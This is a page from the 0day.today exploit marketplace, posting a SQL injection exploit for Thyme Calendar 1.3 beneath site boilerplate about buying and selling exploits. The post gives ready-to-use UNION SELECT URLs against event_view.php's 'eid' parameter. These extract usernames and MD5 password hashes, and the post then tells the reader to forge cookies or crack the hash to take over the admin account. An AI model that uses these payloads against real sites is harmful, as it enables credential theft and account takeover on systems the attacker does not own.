0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Thyme Calendar 1.3 Remote SQL Injection Vulnerability
===================================================== Thyme Calendar 1.3 Remote SQL Injection Vulnerability ===================================================== ################################################## ## Thyme Calendar 1.3 SQL Vulnerability Exploit ## ## by Warlord ## ################################################## ------------------------------------------------------------------- OVERVIEW AND DEFINITION ------------------------------------------------------------------- A vulnerability in exists in Thyme Calendar 1.3 (and possibly lower versions) which allows execution of a custom SQL query. The vulnerability exists in event_view.php, because the 'eid' field is not properly validated. An attacker could exploit the vulnerabilit with the following request: http://sitename/thyme_directory/event_view.php?eid=34 UNION SELECT userid FROM thyme_Users Where 'sitename' is the name of the site, and 'thyme_directory' is the directory in which Thyme is located. ------------------------------------------------------------------- SQL QUERY ------------------------------------------------------------------- The SQL query originally looks like this: SELECT id FROM thyme_Attachments WHERE eid = 34 But by changing the 'eid' field we get a query that looks like this: SELECT id FROM thyme_Attachments WHERE eid = 34 UNION SELECT userid FROM thyme_Users ------------------------------------------------------------------- RESULT OF NEW QUERY ------------------------------------------------------------------- The result is that the query sends back all the userid's (actually usernames) from the database instead of the 'id' from thyme_Attachments. You will be able to grab the userid's from the HTML source by searching for 'aid=' as this is where the attachment id is supposed to go. For example: http://sitename/thyme_directory/download_attachment.php?aid=admin ------------------------------------------------------------------- GETTING PASSWORDS ------------------------------------------------------------------- And the password (md5'd) can be obtained in the same fashion: http://sitename/thyme_directory/event_view.php?eid=34 UNION SELECT pass FROM thyme_Users WHERE username = "admin" In the HTML source: http://sitename/thyme_directory/download_attachment.php?aid=9ab1c5afa4946ca0030271736f38c83a ------------------------------------------------------------------- HOW TO EXPLOIT ------------------------------------------------------------------- Cookies should be modifiable. If not, crack the md5! http://md5.rednoize.com # 0day.today [2024-12-24] #